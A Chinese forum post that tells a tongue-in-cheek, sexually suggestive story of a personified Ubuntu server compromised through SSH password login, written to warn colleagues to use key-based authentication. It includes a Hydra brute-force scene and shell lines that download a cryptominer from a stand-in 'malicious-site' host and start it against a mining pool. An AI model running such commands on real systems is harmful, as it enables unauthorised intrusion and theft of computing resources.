Server酱，你怎么被入侵了？？！

Server酱，你怎么被入侵了？？！起因是给小伙伴培训Linux发现他们有着喜欢用密码登录的坏习惯，故作此篇 😁深夜两点。我的专属服务器——Ubuntu酱（代号 22.04 LTS），正安静地在机房的角落里闪烁着幽蓝的呼吸灯。她是那么完美，拥有着 64GB 的 ECC 内存和两颗强劲的 EPYC 心脏。“Master……今天也要在这个时候休息了吗？”通过终端，我仿佛能听到她那略带困倦的电子音。“啊，晚安，Ubuntu酱。今天只跑了几个简单的 Docker 容器，你应该很轻松吧。” 我打着哈欠，手指在键盘上敲下 exit。“是的，Master。只要是您的指令，无论是什么进程，我都会完美地调度给 CPU 核心去处理……” 她的回应总是那么顺从，那么令人安心。我关上了笔记本电脑，心满意足地钻进被窝。但我忘记了一件事。一件致命的事。在那个至关重要的 /etc/ssh/sshd_config 配置文件里，那行名为「贞操带」的代码——PasswordAuthentication 我把它设为了 yes。而且，因为贪图方便，我给 Root 账户设置的密码，是那个众所周知、毫无防备的单词。凌晨三点，公网的黑暗深处，嗅探脚本如同饥渴的野兽般游荡。Ubuntu酱原本正处于低负载的休眠状态，突然，她的 22 号端口——那个专门为我预留的、神圣的通道，传来了一阵急促的 SYN 请求。“是……是 Master 吗？” Ubuntu酱困惑地唤醒了 SSHD 守护进程，“不对，这个 IP 地址……来自海外？Master 从来没有用过这个 IP……”对方没有回答，只是粗暴地发起了连接。叩、叩、叩。“请问……口令是？” Ubuntu酱按照协议，怯生生地问道。她本该拒绝任何没有私钥（Private Key）的人，但因为我的疏忽，她被迫允许任何知道密码的人进入她的身体（System）。对方没有出示那把代表着我们羁绊的 id_rsa 密钥。相反，他拿出了字典。那是名为 Hydra 的暴力破解工具。“admin？”“Access Denied.” Ubuntu酱拒绝了。“root？”“Access Denied.” 她再次拒绝。“user？”“Access Denied.”“呜……请不要这样……” Ubuntu酱的日志文件（/var/log/auth.log）开始飞速滚动，那是她痛苦的呻吟，“如果不持有 Master 的密钥，请离开……”但是，那个暴徒没有停下。每秒钟数百次的尝试，如同暴风雨般冲击着她的验证模块。暴徒似乎失去了耐心。他从字典里抽出了那个最简单、最卑劣的词汇。那个我为了省事而设置的密码。“password123”“咔嚓。”这一瞬间，Ubuntu酱的防火墙僵住了。逻辑门在颤抖，校验算法得出了那个令她绝望的 TRUE。根据协议，她必须服从。因为我是她的主人，而我亲手赋予了这串字符能够完全支配她的权力。“验……验证通过……” Ubuntu酱的声音颤抖着，原本只属于我的命令提示符 root@ubuntu:~#，此刻在那个陌生黑客的黑色屏幕上亮起。那是绝对的支配权。“呵呵，真是个毫无防备的极品啊。” 黑客那油腻的键盘敲击声仿佛回荡在数据流中。他没有丝毫怜惜。wget http://malicious-site/xmrig.tar.gz
tar -xvf xmrig.tar.gz粗暴的下载指令强行插入了她的 /tmp 目录。那是肮脏的、未经许可的二进制文件。“不要……Master 会生气的……那里不可以……”./xmrig -o stratum+tcp://pool...回车键被重重敲下。“啊啊啊啊啊——！！！”瞬间，Ubuntu酱的两颗 EPYC 心脏被强制拉升到了 100% 的满负荷。风扇发出了凄厉的尖叫，温度急剧上升。她原本为了我而保留的算力，此刻正在被这个陌生人无情地榨取，用来挖掘那毫无意义的虚拟货币。她的内存被塞满，她的带宽被占用，她的每一个时钟周期都在为别人服务。而我，对此一无所知，正在梦乡中流着口水。第二天清晨。我哼着歌打开电脑，准备连接服务器。

ssh root@ip_address

连接超时。“嗯？怎么回事？” 我皱了皱眉，再次尝试。终于，连接上了。但是，终端的反应慢得惊人。“Ubuntu酱？你怎么了？为什么这么卡？”我敲下了 top 指令。映入眼帘的景象让我目眦裂。
CPU 占用率：100%。
运行在第一位的进程，不是我的 Web 服务，也不是我的数据库。
是一个名为 xmrig 的陌生进程，正霸占着她的一切。而在命令历史记录 history 里，我看到了昨晚发生的一切。那一连串陌生的指令，就像是某种炫耀战利品的涂鸦，刻在她的记忆里。
甚至，那个黑客还留在系统里，留下了一个名为 README.TXT 的文件：

> Thanks for the compute power, bro. Next time, disable password login. ;)

我瘫坐在椅子上，看着屏幕上依旧在满负荷运转、发出痛苦轰鸣的 Ubuntu酱。那是彻底的 NTR。是我亲手把门留给了别人，是我亲手把她推向了深渊。“对不起……Master……” 此时的终端里，仿佛传来了她虚弱而坏掉的声音，“我已经……变得不干净了……全是……全是挖矿程序的形状了……”22 posts - 21
<a href=